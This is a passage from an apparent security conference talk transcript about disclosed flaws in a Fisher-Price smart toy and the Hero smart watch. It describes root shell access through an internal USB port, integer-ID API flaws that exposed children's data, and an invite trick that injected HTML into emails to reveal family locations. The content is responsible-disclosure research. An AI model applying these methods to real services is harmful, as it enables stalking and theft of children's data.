lot of those things outpatched very quickly, right? So that's good. Family is safe, yay. And then we also had some good conversations with many of the vendors about other products they're working on, talking about like roadmaps and stuff. So hopefully we prevented some future bugs in New York actually. The, I'm gonna screw up. I think the Department of Consumer Affairs in New York, they actually went ahead and opened an investigation into I think six of these vendors. So it was a formal investigation that I have no insight into other than a conversation I had with them. So it's state government basically going after vendors for I'm gonna assume like negligence or something else, right? Like these are pretty problematic things for people's privacy. So I'm not sure where that's gonna end up but it's certainly important that people are taking the time to look into these issues. So the next part here, we're doing okay. So the next part here, Fisher Price Smart Toy, anyone have one of these, seen one of these on TV? I think there's been some commercials here and there. But cute, cute like Teddy Ruckspin with Bluetooth and Wi-Fi basically, right? If you had a Teddy Ruckspin back when. And so, you know, got this thing. I actually got this thing at a, I guess diaper party is the way we say it. Like basically my friends to celebrate my oncoming baby to give me stuff. I got this as a gift from one of my friends who's also an infosec, knows I do this kind of stuff. And it's more of like, I know you will never get this to your child because you're going to ruin it as soon as I give it to you. And that's what happened, right? It was sewn really well to their credit. So it's not really my fault, I guess. So it has Wi-Fi, it has Bluetooth which actually isn't used for anything right now but that might be like a future feature set thing that they're going to do. It has a camera and so you hear like child toy camera, I know where this is going to go. Actually, that's not where it goes at all because the camera, first off, the camera's terrible. What the camera's meant for is there's these little like cards and it basically just does image recognition when you hold the card up to the toy and it goes, oh, I know that's a toothbrush. Therefore, I will do the toothbrush game, okay? It's not streaming over the internet. It's not uploading your child's photos anywhere. It's all just local processing within one application. Not to say that it's not, things that could go wrong with that, mind you, but just inherently and the same thing with the audio. The audio, the child says like, play a game or something and the toy goes, okay, I'll play a game, right? It's all local, it's not over the internet, it's not streaming. I'm not an alarmist, like I like bugs that are real bugs. I'm not going to try to tell you these are things that are not things. So the interaction, basically, child, there's games, there's like songs, there's like learning things. It's just, you know, a child's learning toy with Wi-Fi. So there's a mobile app. So this is where the problem is going to come in, FYI. So there's a mobile app, it's for parents. The parents set up a profile. Of course the profile has to ask what your kid's name is. You know, it gives details like date of birth and all this other PII that you probably shouldn't need to give to a toy. So we rip open this toy mercilessly. I tried to like do some Frankenstein job on it later. I just gave up, it was terrible. So that toy's ruined. And you know, here's like a fun hardware thing for varying levels of the word fun. There's a USB, micro USB charging on the back. You know, so I plug it in my computer, check for like data pins, don't see anything. I'm like, oh, that sucks. Pull the whole thing open and find another USB port. Now I'm not like a hardware person. I just like can do enough to do work like this. And so I was like, oh, maybe like the USB on the outside connect to the USB inside. Maybe it's just like for whatever. Nope, completely different USB port, completely different. And that one plugs in and you do ADB shell and you are in the Android environment on this toy. Your root, you're good to go. So you steal, you know, run all the commands, steal all the files, get all the APKs, reverse all the things, you know how this goes. Again, I'm a really, again, as you've been able to tell, I'm a scale person owning one toy in some kid's room by like standing next to them on their Wi-Fi network is not really like interesting to me. I think it's interesting in research perspective but not for what I care about. So I looked at the mobile app because again, internet and there were a bunch of API calls. Now some of them were protected in the way I'll explain in a second. Some of them were not, what would happen is effectively kind of direct object reference type stuff where you were logged in with your session as the attacker and you could select a device ID that's an integer or a customer ID that's an integer and some of the API calls would let you execute on behalf of someone else's account. So the ones that you could do would allow you to steal every child's profile data which has their name, date of birth, gender, spoken language and all the toys that are associated to their account. I was able to basically hijack toys so I could pick a toy based on a device ID and say like, oh, this is my toy now and then on my mobile app, I would now have this other child's toy and I can make it play games and do whatever it does. There's no like audio over the internet again so I can't like yell at a child that would be. And then the accounts themselves have profiles inside of the mobile app account. So I can create, update and delete the profiles in the parent's mobile app so I can do dumb things like say I'm the captain now because I was watching Captain Phillips and thought that was hilarious at the moment and so you can change names, you can make like obscene accounts and put it on someone like parents' phone and make them just strut about life. You can change details, do all that kind of stuff. So it's mostly just harassment, it's annoying, it's not scary in the traditional way. But again, if you're a parent that's not in InfoSec in any way, shape or form, you probably would think it's terrifying if like the name of your child's toy turned into like an obscenity one night, right? Like that would not make you feel okay. So again, disclosure timelines, got stuff fixed. Fisher Price was really good to work with and got pretty well worked together on some things and also looked a little bit ahead as well. So last quick thing that we'll talk about, Hero Smart Watch. So this was a smart watch that was funded initially by Indiegogo for 215K US and then $2 million more, so pretty decent investment into an IoT smart watch. Has both a mobile app as well as the smart watch and the nuance here to think about is that they provide a platform and these things are clients. So the mobile app is a client, the smart watch is a client. The backend platform unifies and does all the magic, right? The mobile app's been out forever. The watches as far as I know today are still in beta and only been like given out to a handful of Indiegogo like funders, but the mobile app's been around for multiple years and it has full functionality where that it tracks you, it does geo-fencing, it does all these like tracking people type things like it's basically find my friend or find my whatever, but in their own app, in their own ecosystem for what that's worth. So a lot of very creepy things that you can do. As an app developer, if you've developed enough things or reversed enough things or hacked enough things, you'll start noticing things when you look at API calls, when you look at JSON blobs that like just irk you and go that that's weird and it's probably weird for a bad reason. So the TLDR here is that I saw a request go over that had a session ID and a user ID. In most cases, your session ID is linked to your user ID and you shouldn't have to say I am user XYZ because your session knows your user XYZ. Now sometimes it's innocuous, it's just they select all in there like they're MySQL query or whatever or SQLite query and they just grab all the records and shoot all the data over. In this case, this was a red flag that was actually a real red flag. So I'm gonna have to explain this because this is super small, I apologize. We've got three things happening here. We have an attacker account, they have a pawn account that they created and we have a target account. So the pawn account will actually invite the attacker but they'll put the target user ID in the request. So they invite one person but then add that user ID as a different person that's the target. I as the attacker then receive an email that says hey, the pawn account wants to be your friend and I hit a link and it says good, you've accepted whatever. The pawn account gets a notification that says hey, so and so accepted your request so it's like social network, right? The only nuance here that's bad for me, good for the world is that the target gets an email that says the attacker, hopefully not named attacker was added to their family account. What's important here to think about like social engineering, not really my shtick but social engineering in general, people ignore stuff that you think they would probably not ignore if you were a security person but in reality they do. The cool thing is the name that I can put in as the attacker can be, it can be HTML. I can actually put HTML that will then be sent in to the email they get so I can do some weird DOM stuff maybe for certain interfaces but I can just say something very simple like this is a test, please ignore as the name of my attacker account and the person's probably not gonna care, notice, think twice about just delete the email and go on their way, right? The other thing is as soon as I'm added because they have no control over this as soon as I'm added I get all the history of all the people I see all the data immediately, that's done. So even if they check their email and they're like oh my god someone might be in my account I've already gotten all your information I already know where everyone is I know where your children are I know where you are, it's not good, right? So at best it's reactive but reality they're probably not gonna notice. So user account or attacker account sends a request, accepts a request which again I control all of that and now I see the target account this is just an integer again just enumerate all the integers, get all the accounts, get all the data, get all the people. Disclosure, little slower disclosure there were some hiccups there I will say but we got it done. So those are all the IoT things and all the terrible things that you're probably scared to buy for your children now and then a couple of things built securely as an initiative I co-founded a few years ago we actually work with IoT vendors that have either less money, resources, time, team, expertise and we actually do pro bono basically I'll call them bug bounties but we have no value where it's all pro bono for us so we're just helping them out and trying to up the ante of IoT security a little bit there's also an OWASP IoT top 10 the online trust alliance has a vendor-focused IoT framework that will actually help people have at least some basic checklist again checklists are not solving problems usually but we have nothing right now vendors have no clue what they should be doing or thinking about it's at least a little bit better than it is I think Google has some cool projects that are trying to take out the firmware problem because that's a huge problem take out the internet device communication problem because that's a huge problem give you secure by default or secure-ish by default things more so than we have now so run out of time pretty much I know Guillain and Jordan need to get up here and I want to see their talk I will be around after their talk so if you want to say hi, glad to chat the slides are online if you want to shoot me an email feel free to do that I will get you the deck but thank you for having me it's great to be in Montreal have a good day